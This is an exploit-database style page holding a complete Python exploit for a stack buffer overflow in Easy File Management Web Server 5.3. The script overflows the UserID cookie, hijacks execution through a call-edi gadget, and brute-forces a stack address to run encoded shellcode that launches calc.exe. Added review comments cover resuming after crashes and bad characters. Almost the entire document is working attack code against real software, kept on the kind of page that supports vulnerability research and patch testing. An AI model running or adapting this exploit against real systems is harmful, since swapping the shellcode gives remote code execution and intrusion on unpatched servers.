
Easy File Management Web Server 5.3 Buffer Overflow

Posted on 22 May 2014

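#!/usr/bin/env python
# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.web-file-management.com/download.php
# Version: 5.3
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when the following instruction is
# executed:
#
#   0x00468702: call dword ptr [edx+28h]
#
# Very similar to Easy File Sharing Web Server 6.8 exploit here:
# http://www.exploit-db.com/exploits/33352/
# I suspect their other web server solutions might be vulnerable to a similar
# overflow.
#
# Tested with Easy File Management Web Server installed in the default location
# at C:\EFS Software\Easy File Management Web Server
#
# Operational notes (review):
#  - Each wrong guess of the stack address makes the server dereference a bad
#    pointer, so the target process will normally crash and has to be
#    restarted before the next attempt. The script cannot detect success or a
#    crash; when a connection is refused it stops and tells you which guess to
#    resume from (3rd CLI argument) instead of burning the remaining guesses.
#  - Usage: python exploit.py [target] [port] [start_byte]
#  - Only run this against a lab host you are authorised to test.
import socket
import struct
import sys

TARGET = "172.16.229.134"
PORT = 80

# Address of a "call edi" gadget in LoadImage.dll on the tested XP builds.
# Re-verify it for any other build/language of Windows before use.
CALL_EDI = 0x1001646a

# Stack address template: only the second byte (bits 16-23) changes between
# runs, so the brute force iterates that byte over 0x01..0xfe.
STACK_BASE = 0x01009898

# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
SHELLCODE = (
    b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    b"\x1c\x39\xbd"
)


def stack_guess(second_byte):
    """Return the candidate EDX value for brute-force iteration *second_byte*.

    The template is 0x01XX9898 where XX is *second_byte* (0..255).
    Raises ValueError when *second_byte* is outside that range.
    """
    if not 0 <= second_byte <= 0xff:
        raise ValueError("second_byte must be in 0..255")
    return STACK_BASE | (second_byte << 16)


def build_payload(guess):
    """Build the UserID cookie value (bytes) for one guessed stack address.

    Layout (byte offsets):
      0    20 x 'A'                  padding
      20   CALL_EDI, little-endian   the pointer the server fetches via [edx+28h]
      24   56 x 'B'                  padding
      80   guess, little-endian      ends up in EDX
      84   20 x NOP                  sled
      104  SHELLCODE                 pops calc.exe

    The shellcode was encoded to avoid NUL (0x00) and space (0x20); the padding,
    gadget and sled contain neither. NOTE(review): the guess whose varying byte
    is 0x20 does contain a space, and the original script tries it anyway - if
    0x20 really is a bad character for the cookie that single guess cannot work.
    """
    return (
        b"A" * 20
        + struct.pack("<I", CALL_EDI)
        + b"B" * 56
        + struct.pack("<I", guess)
        + b"\x90" * 20
        + SHELLCODE
    )


def build_request(target, port, payload):
    """Return the raw HTTP request (bytes) carrying *payload* in the UserID cookie.

    Header text is ASCII and is encoded with latin-1 so the binary *payload* can
    be spliced in unchanged.
    """
    head = (
        "GET /vfolder.ghp HTTP/1.1\r\n"
        "User-Agent: Mozilla/4.0\r\n"
        "Host:" + target + ":" + str(port) + "\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: en-us\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://" + target + "/\r\n"
        "Cookie: SESSIONID=6771; UserID="
    ).encode("latin-1")
    tail = (
        "; PassWD=;\r\n"
        "Conection: Keep-Alive\r\n"  # sic - header-name typo kept from the original
        "\r\n"
    ).encode("latin-1")
    return head + payload + tail


def send_attempt(target, port, payload, timeout=5.0):
    """Open one TCP connection, send the full request, and close the socket.

    Uses sendall() so a partial write cannot silently truncate the payload, and a
    socket timeout so a hung server cannot stall the brute force. Any
    socket.error propagates to the caller.
    """
    sock = socket.create_connection((target, port), timeout)
    try:
        sock.sendall(build_request(target, port, payload))
    finally:
        sock.close()


def main(target=TARGET, port=PORT, start=1):
    """Brute-force the varying stack byte from *start* to 0xfe, one request each.

    Stops with exit status 1 on the first connection failure, which after a
    wrong guess usually means the server crashed; the message names the guess
    to resume from once the service is back.
    """
    for i in range(start, 255):
        guess = stack_guess(i)
        print("trying 0x%08x" % guess)
        try:
            send_attempt(target, port, build_payload(guess))
        except socket.error as exc:
            sys.stderr.write(
                "connection to %s:%s failed at byte %d (0x%08x): %s\n"
                "restart the service and rerun with start byte %d\n"
                % (target, port, i, guess, exc, i)
            )
            sys.exit(1)


if __name__ == "__main__":
    cli_target = sys.argv[1] if len(sys.argv) > 1 else TARGET
    cli_port = int(sys.argv[2]) if len(sys.argv) > 2 else PORT
    cli_start = int(sys.argv[3]) if len(sys.argv) > 3 else 1
    main(cli_target, cli_port, cli_start)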

 
